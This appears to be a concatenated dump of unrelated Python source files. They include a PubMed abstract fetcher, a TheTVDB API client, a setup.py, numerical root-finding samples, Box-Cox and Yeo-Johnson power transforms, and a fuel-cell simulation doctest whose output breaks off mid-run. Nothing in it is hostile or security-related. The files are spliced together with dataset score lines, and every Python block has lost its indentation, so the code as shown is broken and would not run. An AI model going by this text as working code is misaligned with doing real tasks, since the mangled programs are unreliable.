data = get_data_from_pmid(pmid, email)
if data is None:
pmids_not_found.append(pmid)
else:
if data['Title'] != '':
sentences.extend(get_sentences_dictionary(data['Title'], passage_type = 't',
doc_id=pmid, stop_words=dl_config.stop_words,
lower=dl_config.lower,
remove_punctuation=dl_config.remove_punctuation,
split_by_hyphen=dl_config.split_by_hyphen,
lemmatization=dl_config.lemmatization,
stems=dl_config.stems))
if data['Abstract'] != '':
sentences.extend(get_sentences_dictionary(data['Abstract'], passage_type = 'a',
doc_id=pmid, stop_words=dl_config.stop_words,
lower=dl_config.lower,
remove_punctuation=dl_config.remove_punctuation,
split_by_hyphen=dl_config.split_by_hyphen,
lemmatization=dl_config.lemmatization,
stems=dl_config.stems))
if sentences:
doc = Document(sentences=sentences)
doc.raw_title = data['Title']
docs.append(doc)
else:
pmids_not_found.append(pmid)
return docs, pmids_not_found
#using PMID
def get_data_from_pmid(pmid, email):
Entrez.email = email
Entrez.api_key = '<KEY>'
handle = efetch(db='pubmed', id=int(pmid), retmode='xml')
xml_data = read(handle)
handle.close()
try:
article = xml_data['PubmedArticle'][0]['MedlineCitation']['Article']
title = article['ArticleTitle']
try:
abstract = article['Abstract']['AbstractText'][0]
return {'Title': title, 'Abstract': abstract}
except:
return {'Title': title, 'Abstract': ''}
except:
article = xml_data['PubmedBookArticle'][0]['BookDocument']
title = article['ArticleTitle']
try:
abstract = article['Abstract']['AbstractText'][0]
return {'Title': title, 'Abstract': abstract}
except:
return {'Title': title, 'Abstract': ''}
#Using Term
def term_to_docs(term, email, retmax, dl_config):
pmids = get_data_from_term(term, email, retmax)
if pmids is None:
return None
else:
docs, pmids_not_found = pmids_to_docs(pmids, email, dl_config)
return docs
def get_data_from_term(term, email, retmax):
Entrez.email = email
Entrez.api_key = '<KEY>'
handle = Entrez.esearch(db="pubmed", retmax=retmax, term=term, idtype="acc", sort='relevance')
record = Entrez.read(handle)
handle.close()
return record['IdList']
#Using pdfs
def pdf_paths_to_titles(pdf_paths, email):
titles = []
for pdf_path in pdf_paths:
with open(pdf_path, 'rb') as f:
titles.append(get_data_from_pdf(f, email))
return titles
def pdfs_to_docs(files, email, dl_config):
pmids = []
docs_not_found = []
try:
for file in files:
pmid = get_data_from_pdf(file, email)
if pmid:
pmids.append(pmid)
else:
docs_not_found.append(file.filename)
docs, pmids_not_found = pmids_to_docs(pmids, email, dl_config)
return docs, docs_not_found
except:
return None, None
def get_data_from_pdf(file, email):
Entrez.email = email
Entrez.api_key = '<KEY>'
try:
title = get_title_from_io(file)
pmid = get_data_from_term(term=title, email='<EMAIL>', retmax=1)[0]
return pmid
except:
return None
if __name__ == '__main__':
# path = 'D:/Desktop/artigos/rdml.pdf'
# #id = 20367574
# print(get_data_from_pdf_path(path, '<EMAIL>'))
# term = "Predicting commercially available antiviral drugs that may act on the novel coronavirus (SARS-CoV-2) through a drug-target interaction deep learning model"
# print(get_data_from_term(term, '<EMAIL>', 1)['IdList'])
paths = ['D:/Desktop/artigos/Burns.pdf',
'D:/Desktop/artigos/Fergadis.pdf',
'D:/Desktop/artigos/Luo.pdf',
'D:/Desktop/artigos/Mohan.pdf',
'D:/Desktop/artigos/rdml.pdf',
'D:/Desktop/artigos/Yan.pdf']
pdf_paths_to_titles(paths, '<EMAIL>.com') | 2.421875 | 2 |
qiradb/qiradb/__init__.py | pAplakidis/qira | 0 | 12797511 | <filename>qiradb/qiradb/__init__.py
from qiradb._qiradb import *
| 1.179688 | 1 |
common/utils/api_utils.py | hvsuchitra/tv_tracker | 0 | 12797512 | <gh_stars>0
import requests
import requests_cache
# path when running from gui
requests_cache.install_cache(cache_name='../common/cache/api', backend='sqlite', expire_after=86400)
# requests_cache.install_cache(cache_name='../../common/cache/api', backend='sqlite', expire_after=86400)
resource_base_url = 'https://thetvdb.com'
api_base_url = 'https://api.thetvdb.com'
resource_base_url_per_ep = 'https://thetvdb.com/banners/'
headers = {}
def get_jwt():
data = {'apikey': 'api_key', 'username': 'username',
'userkey': 'user_key'}
with requests_cache.disabled():
response = requests.post(f'{api_base_url}/login', json=data)
if response.status_code == 200:
global headers
jwt = response.json()['token']
headers['Authorization'] = f'Bearer {jwt}'
return jwt
def search_show(show_name):
shows = requests.get(f'{api_base_url}/search/series', params={'name': show_name}, headers=headers).json()
cols_needed = ('id', 'seriesName', 'status', 'image', 'overview', 'network', 'firstAired')
if shows.get('Error'): return None
yield from (
dict(zip(cols_needed, (show.get(col) if show.get(col) is not None else 'Not Available' for col in cols_needed)))
for
show in shows['data'])
def get_image(url):
return requests.get(resource_base_url + url, headers=headers).content
def get_episode_count(show_id):
url = f'{api_base_url}/series/{show_id}/episodes/summary'
response_json = requests.get(url, headers=headers).json()
season_list, episode_count, *_ = response_json['data'].values()
return season_list, int(episode_count)
def get_image_per_ep(url):
return requests.get(resource_base_url_per_ep + url, headers=headers).content
get_jwt()
| 2.484375 | 2 |
setup.py | LaCiberReserva/api-python-sdk | 6 | 12797513 | from setuptools import setup, find_packages
setup(
name='blueliv-python-sdk',
version='2.3.0',
description='Blueliv API SDK for Python',
url='https://github.com/Blueliv/api-python-sdk',
author='Blueliv',
author_email='<EMAIL>',
license='MIT',
classifiers=[
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'Topic :: Software Development :: Build Tools',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.2',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
],
keywords='blueliv api crime servers bot ips security',
packages=find_packages(exclude=['contrib', 'docs', 'tests*']),
install_requires=['requests>=2.4.0, <= 2.5.1', 'python-dateutil>=2.4.0'],
test_requires=['mock']
)
| 1.273438 | 1 |
sample_equations.py | lsDantas/Numerical-Analysis | 0 | 12797514 | # Sample Equations
#
# Description: Sample functions (and their derivatives)
# to be used with the root-finding algorithms.
#
#Equation 1
def eq1(x):
return x**5 - 5*x + 1
def eq1_d(x):
return 5*(x**4) - 5
# Equation 2
def eq2(x):
return (pow(x, 2) - 4)
def eq2_d(x):
return 2*x | 3.6875 | 4 |
bucky/util/power_transforms.py | hanijames/bucky | 0 | 12797515 | <filename>bucky/util/power_transforms.py
"""Simple power transformation classes."""
# pylint: disable=unused-variable
from ..numerical_libs import sync_numerical_libs, xp
# TODO this could be better organized...
@sync_numerical_libs
def yeojohnson(y, lam):
"""Yeo-Johnson tranform, batched in the first dimension."""
y_in = y.astype(xp.float64)
lam1 = xp.broadcast_to(lam, (y_in.shape[0], 1)).astype(xp.float64)
ret = xp.empty(y.shape)
zero_mask = xp.around(xp.ravel(lam1), 4) == 0.0
two_mask = xp.around(xp.ravel(lam1), 4) == 2.0
pos_mask = y_in >= 0.0
zero_mask = xp.broadcast_to(zero_mask[:, None], pos_mask.shape)
two_mask = xp.broadcast_to(two_mask[:, None], pos_mask.shape)
lam1 = xp.broadcast_to(lam1, pos_mask.shape)
ret[pos_mask] = ((y_in[pos_mask] + 1.0) ** lam1[pos_mask] - 1.0) / lam1[pos_mask]
ret[pos_mask & zero_mask] = xp.log(y_in[pos_mask & zero_mask] + 1.0)
ret[~pos_mask] = ((1.0 - y_in[~pos_mask]) ** (2.0 - lam1[~pos_mask]) - 1.0) / (lam1[~pos_mask] - 2.0)
ret[(~pos_mask) & two_mask] = -xp.log(1.0 - y_in[(~pos_mask) & two_mask])
return ret, lam1[:, 0][..., None]
@sync_numerical_libs
def inv_yeojohnson(y, lam):
"""Inverse Yeo-Johnson tranform, batched in the first dimension."""
y_in = y.astype(xp.float64)
lam1 = xp.broadcast_to(lam, (y_in.shape[0], 1)).astype(xp.float64)
ret = xp.empty(y.shape)
zero_mask = xp.around(xp.ravel(lam1), 4) == 0.0
two_mask = xp.around(xp.ravel(lam1), 4) == 2.0
pos_mask = y_in >= 0.0
zero_mask = xp.broadcast_to(zero_mask[:, None], pos_mask.shape)
two_mask = xp.broadcast_to(two_mask[:, None], pos_mask.shape)
lam1 = xp.broadcast_to(lam1, pos_mask.shape)
ret[pos_mask] = (lam1[pos_mask] * y_in[pos_mask] + 1.0) ** (1.0 / lam1[pos_mask]) - 1.0
ret[pos_mask & zero_mask] = xp.exp(y_in[pos_mask & zero_mask]) - 1.0
ret[~pos_mask] = -(((lam1[~pos_mask] - 2.0) * y_in[~pos_mask] + 1.0) ** (1.0 / (2.0 - lam1[~pos_mask]))) + 1.0
ret[(~pos_mask) & two_mask] = -xp.exp(-y_in[(~pos_mask) & two_mask]) + 1.0
return ret
@sync_numerical_libs
def boxcox(y, lam, lam2=None):
"""Box-Cox tranform, batched in the first dimension."""
# TODO add axis param
# if axis is None:
# a = xp.ravel(a)
# axis = 0
axis = y.ndim - 1
y_in = y.astype(xp.float64)
lam1 = xp.broadcast_to(lam, (y_in.shape[0], 1)).astype(xp.float64)
if lam2 is None:
lam2 = 1.0 - xp.min(y_in, axis=axis, keepdims=True)
ret = xp.empty(y.shape)
zero_mask = xp.around(xp.ravel(lam1), 4) == 0.0
ret[zero_mask] = xp.log(y_in[zero_mask] + lam2[zero_mask])
ret[~zero_mask] = ((y_in[~zero_mask] + lam2[~zero_mask]) ** lam1[~zero_mask] - 1.0) / lam1[~zero_mask]
return ret, lam1, lam2
@sync_numerical_libs
def inv_boxcox(y, lam1, lam2):
"""Inverse Box-Cox tranform, batched in the first dimension."""
y_in = y.astype(xp.float64)
ret = xp.empty(y.shape)
zero_mask = xp.around(xp.ravel(lam1), 4) == 0.0
ret[zero_mask] = xp.exp(y_in[zero_mask]) - lam2[zero_mask]
ret[~zero_mask] = (lam1[~zero_mask] * y_in[~zero_mask] + 1.0) ** (1.0 / lam1[~zero_mask]) - lam2[~zero_mask]
return ret
def norm_cdf(x, mu, sigma):
"""Normal distribution CDF, batched."""
t = x - mu[:, None]
y = 0.5 * xp.special.erfc(-t / (sigma[:, None] * xp.sqrt(2.0))) # pylint: disable=no-member
y[y > 1.0] = 1.0
return y
@sync_numerical_libs
def fit_lam(y, yj=False, lam_range=(-2, 2, 0.1)):
"""Fit lambda of a power transform using grid search, taking the the most normally distributed result."""
# TODO currently this just minimizes the KS-stat,
# would might better to used shapiro-wilk or 'normaltest' but we'd need a batched version
y_in = xp.atleast_2d(y)
batch_size = y_in.shape[0]
best_ks = xp.full(batch_size, xp.inf)
best_ks_lam = xp.empty(batch_size)
for lam in xp.around(xp.arange(*lam_range), 6):
if yj:
yp, _ = yeojohnson(y, lam)
else:
yp, _, _ = boxcox(y_in, lam)
ys = xp.sort(yp, axis=1)
cdf = xp.cumsum(ys, axis=1) / xp.sum(yp, axis=1, keepdims=True)
ks = xp.max(xp.abs(cdf - norm_cdf(ys, xp.mean(yp, axis=1), xp.var(yp, axis=1))), axis=1)
ks_mask = ks < best_ks
best_ks[ks_mask] = ks[ks_mask]
best_ks_lam[ks_mask] = lam
return (best_ks, best_ks_lam)
class BoxCox:
"""Wrapper class for a Box-Cox transformer."""
def __init__(
self,
):
"""Init lambda storage."""
self.lam1 = None
self.lam2 = None
def fit(self, y):
"""Fit the batched 1d variables in y, store the lambdas for the inv transform."""
ks = fit_lam(y, yj=False)
ret, self.lam1, self.lam2 = boxcox(y, ks[1][:, None])
return ret
def inv(self, y):
"""Inverse tranform using the fitted lambda values."""
return inv_boxcox(y, self.lam1, self.lam2)
class YeoJohnson:
"""Wrapper class for a Yeo-Johnson transformer."""
def __init__(
self,
):
"""Init lambda storage."""
self.lam1 = None
def fit(self, y):
"""Fit the batched 1d variables in y, store the lambdas for the inv transform."""
ks = fit_lam(y, yj=True)
ret, self.lam1 = yeojohnson(y, ks[1][:, None])
return ret
def inv(self, y):
"""Inverse tranform using the fitted lambda values."""
return inv_yeojohnson(y, self.lam1)
| 2.265625 | 2 |
dztools/DZtools.py | kurtsundell/DZtools | 1 | 12797516 | import sys
#import argparse
import pandas as pd
import matplotlib.pyplot as plt
from dztools.stats.intersample import intersample
from dztools.utils.makeplots import makeplots
xmin = 1 # define lower limit for probability density plots (PDPs) and kernel density estimates (KDEs) and all plots
xmax = 4000 #upper limit for PDPs and KDEs and all plots
xint = 1 # discretization interval for PDPs and KDEs only
#DZtools options
DZstats = 1
DZmds = 0
PlotDistributions = 1
def DZ_main():
filename = sys.argv[1]
df = pd.read_csv(filename)
if DZstats == 1:
intersample_results = intersample(df, xmin, xmax, xint)
print(intersample_results)
if PlotDistributions == 1:
fig, axs = makeplots(df, xmin, xmax, xint)
plt.show()
if __name__ == '__main__':
DZ_main()
| 2.546875 | 3 |
opem/Test/test_Padulles_Amphlett.py | Martenet/opem | 173 | 12797517 | # -*- coding: utf-8 -*-
'''
>>> from opem.Dynamic.Padulles_Amphlett import *
>>> import shutil
>>> Test_Vector={"A":50.6,"l":0.0178,"lambda":23,"JMax":1.5,"T":343,"N0":5,"KO2":0.0000211,"KH2":0.0000422,"KH2O":0.000007716,"tH2":3.37,"tO2":6.74,"t1":2,"t2":2,"tH2O":18.418,"rho":1.168,"qMethanol":0.0002,"CV":2,"i-start":0.1,"i-stop":4,"i-step":0.1,"Name":"Test"}
>>> Padulles_Amphlett_Data=Dynamic_Analysis(InputMethod=Test_Vector, TestMode=True)
###########
Padulles-Amphlett-Model Simulation
###########
Analyzing . . .
I : 0.1
E : 6.0684154992732005 V
Eta Activation : 0.18557231242539243 V
Eta Concentration : 1.948431634418616e-05 V
Eta Ohmic : 0.00017548304819292376 V
FC Efficiency : 0.6589203974773784
FC Power : 0.5139579100323552 W
FC Voltage : 5.1395791003235525 V
Loss : 0.18576727978992955 V
PH2 : 0.19717074233280188 atm
PH2O : 0.2426831613626925 atm
PO2 : 0.1906263686382979 atm
Power-Thermal : 0.1010420899676448 W
###########
I : 0.2
E : 6.068413961701556 V
Eta Activation : 0.23146009851376736 V
Eta Concentration : 3.899435456560147e-05 V
Eta Ohmic : 0.0003510800160998837 V
FC Efficiency : 0.6293798842665886
FC Power : 0.9818326194558784 W
FC Voltage : 4.909163097279392 V
Loss : 0.23185017288443285 V
PH2 : 0.1971566919511875 atm
PH2O : 0.24266586776736396 atm
PO2 : 0.1906184358000996 atm
Power-Thermal : 0.24816738054412169 W
###########
I : 0.3
E : 6.068412424065923 V
Eta Activation : 0.2583036192079603 V
Eta Concentration : 5.853018266659147e-05 V
Eta Ohmic : 0.0005267910327125488 V
FC Efficiency : 0.6120471438396443
FC Power : 1.4321903165847678 W
FC Voltage : 4.7739677219492265 V
Loss : 0.25888894042333943 V
PH2 : 0.19714264156957312 atm
PH2O : 0.24264857417203542 atm
PO2 : 0.1906105029619013 atm
Power-Thermal : 0.41280968341523216 W
###########
I : 0.4
E : 6.068410886366294 V
Eta Activation : 0.27735002084480426 V
Eta Concentration : 7.809186891953766e-05 V
Eta Ohmic : 0.0007026162388380664 V
FC Efficiency : 0.5997124668722417
FC Power : 1.8711028966413943 W
FC Voltage : 4.677757241603485 V
Loss : 0.27813072895256186 V
PH2 : 0.19712859118795872 atm
PH2O : 0.24263128057670688 atm
PO2 : 0.19060257012370302 atm
Power-Thermal : 0.588897103358606 W
###########
I : 0.5
E : 6.068409348602667 V
Eta Activation : 0.2921240370409447 V
Eta Concentration : 9.76794818682758e-05 V
Eta Ohmic : 0.0008785557847524419 V
FC Efficiency : 0.5901164085980564
FC Power : 2.30145399353242 W
FC Voltage : 4.60290798706484 V
Loss : 0.2931002723075654 V
PH2 : 0.19711454080634436 atm
PH2O : 0.24261398698137834 atm
PO2 : 0.1905946372855047 atm
Power-Thermal : 0.7735460064675803 W
###########
I : 0.6
E : 6.0684078107750326 V
Eta Activation : 0.3041956781419353 V
Eta Concentration : 0.00011729309032954864 V
Eta Ohmic : 0.0010546098289093816 V
FC Efficiency : 0.5822525519832258
FC Power : 2.724941943281497 W
FC Voltage : 4.541569905469162 V
Loss : 0.30536758106117423 V
PH2 : 0.19710049042472996 atm
PH2O : 0.2425966933860498 atm
PO2 : 0.1905867044473064 atm
Power-Thermal : 0.9650580567185031 W
###########
I : 0.7
E : 6.068406272883388 V
Eta Activation : 0.31440243547871893 V
Eta Concentration : 0.00013693276339445145 V
Eta Ohmic : 0.0012307785370829418 V
FC Efficiency : 0.5755840434599239
FC Power : 3.1426888772911847 W
FC Voltage : 4.489555538987407 V
Loss : 0.3157701467791963 V
PH2 : 0.19708644004311557 atm
PH2O : 0.24257939979072127 atm
PO2 : 0.19057877160910808 atm
Power-Thermal : 1.1623111227088154 W
###########
I : 0.8
E : 6.068404734927729 V
Eta Activation : 0.3232442167420945 V
Eta Concentration : 0.00015659857042988755 V
Eta Ohmic : 0.0014070620817435461 V
FC Efficiency : 0.569790429225178
FC Power : 3.555492278365111 W
FC Voltage : 4.4443653479563885 V
Loss : 0.324807877394268 V
PH2 : 0.19707238966150117 atm
PH2O : 0.24256210619539273 atm
PO2 : 0.1905708387709098 atm
Power-Thermal : 1.3645077216348895 W
###########
I : 0.9
E : 6.068403196908046 V
Eta Activation : 0.3310434726426763 V
Eta Concentration : 0.0001762905810800498 V
Eta Ohmic : 0.0015834606415773538 V
FC Efficiency : 0.5646650099463304
FC Power : 3.96394836982324 W
FC Voltage : 4.404387077581378 V
Loss : 0.3328032238653337 V
PH2 : 0.19705833927988675 atm
PH2O : 0.24254481260006414 atm
PO2 : 0.19056290593271147 atm
Power-Thermal : 1.5710516301767605 W
###########
I : 1.0
E : 6.068401658824337 V
Eta Activation : 0.33802037026202836 V
Eta Concentration : 0.0001960088652678871 V
Eta Ohmic : 0.0017599744011013664 V
FC Efficiency : 0.5600666527156857
FC Power : 4.368519891182348 W
FC Voltage : 4.368519891182348 V
Loss : 0.3399763535283976 V
PH2 : 0.19704428889827239 atm
PH2O : 0.2425275190047356 atm
PO2 : 0.1905549730945132 atm
Power-Thermal : 1.781480108817652 W
###########
I : 1.1
E : 6.068400120676597 V
Eta Activation : 0.3443319458183834 V
Eta Concentration : 0.00021575349319660598 V
Eta Ohmic : 0.0019366035503462617 V
FC Efficiency : 0.55589469312397
FC Power : 4.769576467003663 W
FC Voltage : 4.335978606366966 V
Loss : 0.3464843028619262 V
PH2 : 0.197030238516658 atm
PH2O : 0.24251022540940706 atm
PO2 : 0.19054704025631486 atm
Power-Thermal : 1.9954235329963377 W
###########
I : 1.2
E : 6.068398582464819 V
Eta Activation : 0.35009414904739194 V
Eta Concentration : 0.00023552453535116493 V
Eta Ohmic : 0.002113348284589288 V
FC Efficiency : 0.5520748042471996
FC Power : 5.1674201677537885 W
FC Voltage : 4.306183473128157 V
Loss : 0.3524430218673324 V
PH2 : 0.1970161881350436 atm
PH2O : 0.24249293181407852 atm
PO2 : 0.19053910741811658 atm
Power-Thermal : 2.212579832246212 W
###########
I : 1.3
E : 6.068397044188998 V
Eta Activation : 0.35539503345654255 V
Eta Concentration : 0.0002553220624997795 V
Eta Ohmic : 0.0022902088041253615 V
FC Efficiency : 0.5485505413555333
FC Power : 5.562302489345107 W
FC Voltage : 4.27869422257316 V
Loss : 0.3579405643231677 V
PH2 : 0.19700213775342923 atm
PH2O : 0.24247563821874998 atm
PO2 : 0.19053117457991825 atm
Power-Thermal : 2.432697510654893 W
###########
I : 1.4
E : 6.06839550584913 V
Eta Activation : 0.36030304442922906 V
Eta Concentration : 0.00027514614569545357 V
Eta Ohmic : 0.0024671853140681515 V
FC Efficiency : 0.5452780290261753
FC Power : 5.954436076965834 W
FC Voltage : 4.253168626404167 V
Loss : 0.36304537588899266 V
PH2 : 0.19698808737181484 atm
PH2O : 0.24245834462342142 atm
PO2 : 0.19052324174171997 atm
Power-Thermal : 2.6555639230341663 W
###########
I : 1.5
E : 6.068393967445208 V
Eta Activation : 0.3648724409731032 V
Eta Concentration : 0.0002949968562774962 V
Eta Ohmic : 0.002644278024175193 V
FC Efficiency : 0.5422224856637728
FC Power : 6.344003082266143 W
FC Voltage : 4.229335388177429 V
Loss : 0.3678117158535559 V
PH2 : 0.19697403699020044 atm
PH2O : 0.24244105102809288 atm
PO2 : 0.19051530890352164 atm
Power-Thermal : 2.8809969177338575 W
###########
I : 1.6
E : 6.068392428977227 V
Eta Activation : 0.36914696409844006 V
Eta Concentration : 0.0003148742658730733 V
Eta Ohmic : 0.0028214871486926026 V
FC Efficiency : 0.5393558719759229
FC Power : 6.731161282259518 W
FC Voltage : 4.206975801412199 V
Loss : 0.37228332551300575 V
PH2 : 0.19695998660858605 atm
PH2O : 0.24242375743276434 atm
PO2 : 0.19050737606532336 atm
Power-Thermal : 3.1088387177404826 W
###########
I : 1.7
E : 6.068390890445182 V
Eta Activation : 0.3731623911228729 V
Eta Concentration : 0.0003347784463987542 V
Eta Ohmic : 0.0029988129062160497 V
FC Efficiency : 0.5366552535984287
FC Power : 7.116048662715165 W
FC Voltage : 4.185910978067744 V
Loss : 0.3764959824754877 V
PH2 : 0.19694593622697168 atm
PH2O : 0.2424064638374358 atm
PO2 : 0.19049944322712503 atm
Power-Thermal : 3.338951337284836 W
###########
I : 1.8
E : 6.068389351849069 V
Eta Activation : 0.3769483587657406 V
Eta Concentration : 0.0003547094700620668 V
Eta Ohmic : 0.003176255519565377 V
FC Efficiency : 0.5341016324451575
FC Power : 7.498786919530012 W
FC Voltage : 4.165992733072229 V
Loss : 0.380479323755368 V
PH2 : 0.19693188584535729 atm
PH2O : 0.24238917024210727 atm
PO2 : 0.19049151038892673 atm
Power-Thermal : 3.5712130804699886 W
###########
I : 1.9
E : 6.068387813188879 V
Eta Activation : 0.38052969267197334 V
Eta Concentration : 0.0003746674093630815 V
Eta Ohmic : 0.0033538152156708046 V
FC Efficiency : 0.5316790944492106
FC Power : 7.879484179737301 W
FC Voltage : 4.147096936703843 V
Loss : 0.38425817529700723 V
PH2 : 0.1969178354637429 atm
PH2O : 0.24237187664677873 atm
PO2 : 0.19048357755072845 atm
Power-Thermal : 3.8055158202626993 W
###########
I : 2.0
E : 6.0683862744646095 V
Eta Activation : 0.3839273955127959 V
Eta Concentration : 0.00039465233709598025 V
Eta Ohmic : 0.003531492225469087 V
FC Efficiency : 0.5293741761651032
FC Power : 8.25823714817561 W
FC Voltage : 4.129118574087805 V
Loss : 0.387853540075361 V
PH2 : 0.19690378508212852 atm
PH2O : 0.2423545830514502 atm
PO2 : 0.19047564471253012 atm
Power-Thermal : 4.041762851824391 W
###########
I : 2.1
E : 6.068384735676256 V
Eta Activation : 0.38715939375662295 V
Eta Concentration : 0.00041466432635066115 V
Eta Ohmic : 0.0037092867838082735 V
FC Efficiency : 0.5271753860695316
FC Power : 8.635132823818928 W
FC Voltage : 4.111968011342347 V
Loss : 0.3912833448667819 V
PH2 : 0.19688973470051413 atm
PH2O : 0.24233728945612165 atm
PO2 : 0.19046771187433184 atm
Power-Thermal : 4.279867176181073 W
###########
I : 2.2
E : 6.068383196823811 V
Eta Activation : 0.39024111055794025 V
Eta Concentration : 0.0004347034505143372 V
Eta Ohmic : 0.0038871991293599716 V
FC Efficiency : 0.5250728373249665
FC Power : 9.010249888496427 W
FC Voltage : 4.095568131134739 V
Loss : 0.39456301313781456 V
PH2 : 0.19687568431889974 atm
PH2O : 0.2423199958607931 atm
PO2 : 0.1904597790361335 atm
Power-Thermal : 4.519750111503576 W
###########
I : 2.3
E : 6.068381657907269 V
Eta Activation : 0.39318591119501267 V
Eta Concentration : 0.00045476978327314626 V
Eta Ohmic : 0.004065229504538212 V
FC Efficiency : 0.5230579622427114
FC Power : 9.383659842634243 W
FC Voltage : 4.079852105493149 V
Loss : 0.397705910482824 V
PH2 : 0.19686163393728537 atm
PH2O : 0.24230270226546458 atm
PO2 : 0.19045184619793523 atm
Power-Thermal : 4.761340157365757 W
###########
I : 2.4
E : 6.068380118926627 V
Eta Activation : 0.3960054536369255 V
Eta Concentration : 0.00047486339861378836 V
Eta Ohmic : 0.004243378155424144 V
FC Efficiency : 0.5211232875604884
FC Power : 9.755427943132343 W
FC Voltage : 4.06476164297181 V
Loss : 0.40072369519096346 V
PH2 : 0.19684758355567097 atm
PH2O : 0.242285408670136 atm
PO2 : 0.1904439133597369 atm
Power-Thermal : 5.004572056867657 W
###########
I : 2.5
E : 6.068378579881878 V
Eta Activation : 0.39870996749954657 V
Eta Concentration : 0.000494984370825149 V
Eta Ohmic : 0.00442164533169592 V
FC Efficiency : 0.5192622556245563
FC Power : 10.12561398467885 W
FC Voltage : 4.05024559387154 V
Loss : 0.4036265972020676 V
PH2 : 0.19683353317405658 atm
PH2O : 0.24226811507480747 atm
PO2 : 0.19043598052153862 atm
Power-Thermal : 5.249386015321152 W
###########
I : 2.6
E : 6.068377040773017 V
Eta Activation : 0.40130847825734167 V
Eta Concentration : 0.0005151327744999589 V
Eta Ohmic : 0.004600031286563196 V
FC Efficiency : 0.5174690806642298
FC Power : 10.494272955870581 W
FC Voltage : 4.036258829180992 V
Loss : 0.40642364231840483 V
PH2 : 0.19681948279244216 atm
PH2O : 0.2422508214794789 atm
PO2 : 0.1904280476833403 atm
Power-Thermal : 5.495727044129421 W
###########
I : 2.7
E : 6.068375501600038 V
Eta Activation : 0.4038089891176398 V
Eta Concentration : 0.0005353086845364485 V
Eta Ohmic : 0.004778536276705824 V
FC Efficiency : 0.5157386322058496
FC Power : 10.861455594255196 W
FC Voltage : 4.022761331205627 V
Loss : 0.40912283407888206 V
PH2 : 0.19680543241082776 atm
PH2O : 0.24223352788415034 atm
PO2 : 0.190420114845142 atm
Power-Thermal : 5.7435444057448075 W
###########
I : 2.8
E : 6.068373962362936 V
Eta Activation : 0.40621862980268425 V
Eta Concentration : 0.000555512176140013 V
Eta Ohmic : 0.004957160562216277 V
FC Efficiency : 0.5140663396997094
FC Power : 11.227208859041653 W
FC Voltage : 4.0097174496577335 V
Loss : 0.41173130254104057 V
PH2 : 0.1967913820292134 atm
PH2O : 0.2422162342888218 atm
PO2 : 0.19041218200694368 atm
Power-Thermal : 5.992791140958347 W
###########
I : 2.9
E : 6.068372423061707 V
Eta Activation : 0.4085437792118771 V
Eta Concentration : 0.0005757433248249061 V
Eta Ohmic : 0.005135904406545483 V
FC Efficiency : 0.5124481138904448
FC Power : 11.591576336201861 W
FC Voltage : 3.997095288345469 V
Loss : 0.4142554269432475 V
PH2 : 0.196777331647599 atm
PH2O : 0.24219894069349326 atm
PO2 : 0.1904042491687454 atm
Power-Thermal : 6.24342366379814 W
###########
I : 3.0
E : 6.0683708836963435 V
Eta Activation : 0.4107901672807063 V
Eta Concentration : 0.0005960022064159204 V
Eta Ohmic : 0.005314768076451755 V
FC Efficiency : 0.5108802815228812
FC Power : 11.95459858763542 W
FC Voltage : 3.9848661958784737 V
Loss : 0.41670093756357396 V
PH2 : 0.1967632812659846 atm
PH2O : 0.24218164709816473 atm
PO2 : 0.19039631633054707 atm
Power-Thermal : 6.49540141236458 W
###########
I : 3.1
E : 6.068369344266841 V
Eta Activation : 0.4129629601316751 V
Eta Concentration : 0.0006162888970501038 V
Eta Ohmic : 0.0054937518419525275 V
FC Efficiency : 0.5093595307581349
FC Power : 12.316313453731704 W
FC Voltage : 3.9730043399134525 V
Loss : 0.4190730008706778 V
PH2 : 0.19674923088437024 atm
PH2O : 0.2421643535028362 atm
PO2 : 0.1903883834923488 atm
Power-Thermal : 6.748686546268298 W
###########
I : 3.2
E : 6.068367804773196 V
Eta Activation : 0.41506683170178466 V
Eta Concentration : 0.0006366034731784721 V
Eta Ohmic : 0.005672855976278701 V
FC Efficiency : 0.507882865258588
FC Power : 12.676756316854359 W
FC Voltage : 3.9614863490169867 V
Loss : 0.4213762911512418 V
PH2 : 0.19673518050275585 atm
PH2O : 0.24214705990750765 atm
PO2 : 0.19038045065415046 atm
Power-Thermal : 7.003243683145644 W
###########
I : 3.3
E : 6.0683662652154 V
Eta Activation : 0.417106024344736 V
Eta Concentration : 0.0006569460115677318 V
Eta Ohmic : 0.005852080755831333 V
FC Efficiency : 0.5064475653403494
FC Power : 13.035960331860592 W
FC Voltage : 3.950291009654725 V
Loss : 0.42361505111213504 V
PH2 : 0.19672113012114145 atm
PH2O : 0.2421297663121791 atm
PO2 : 0.19037251781595219 atm
Power-Thermal : 7.259039668139408 W
###########
I : 3.4
E : 6.06836472559345 V
Eta Activation : 0.4190844003836543 V
Eta Concentration : 0.0006773165893020328 V
Eta Ohmic : 0.0060314264601405215 V
FC Efficiency : 0.5050511549266622
FC Power : 13.393956628655083 W
FC Voltage : 3.9393990084279658 V
Loss : 0.4257931434330969 V
PH2 : 0.19670707973952706 atm
PH2O : 0.24211247271685057 atm
PO2 : 0.19036458497775385 atm
Power-Thermal : 7.516043371344917 W
###########
I : 3.5
E : 6.068363185907339 V
Eta Activation : 0.42100548618901656 V
Eta Concentration : 0.0006977152837847073 V
Eta Ohmic : 0.006210893371826288 V
FC Efficiency : 0.5036913732928463
FC Power : 13.750774490894704 W
FC Voltage : 3.9287927116842014 V
Loss : 0.42791409484462756 V
PH2 : 0.1966930293579127 atm
PH2O : 0.24209517912152204 atm
PO2 : 0.19035665213955555 atm
Power-Thermal : 7.774225509105296 W
###########
I : 3.6
E : 6.068361646157063 V
Eta Activation : 0.4228725100457559 V
Eta Concentration : 0.0007181421727400468 V
Eta Ohmic : 0.006390481776561363 V
FC Efficiency : 0.5023661507925354
FC Power : 14.106441514254398 W
FC Voltage : 3.918455976181777 V
Loss : 0.4299811339950573 V
PH2 : 0.1966789789762983 atm
PH2O : 0.2420778855261935 atm
PO2 : 0.19034871930135727 atm
Power-Thermal : 8.033558485745605 W
###########
I : 3.7
E : 6.068360106342617 V
Eta Activation : 0.4246884348310017 V
Eta Concentration : 0.0007385973342150736 V
Eta Ohmic : 0.00657019196303564 V
FC Efficiency : 0.50107358791043
FC Power : 14.460983747095012 W
FC Voltage : 3.9083739857013544 V
Loss : 0.4319972241282524 V
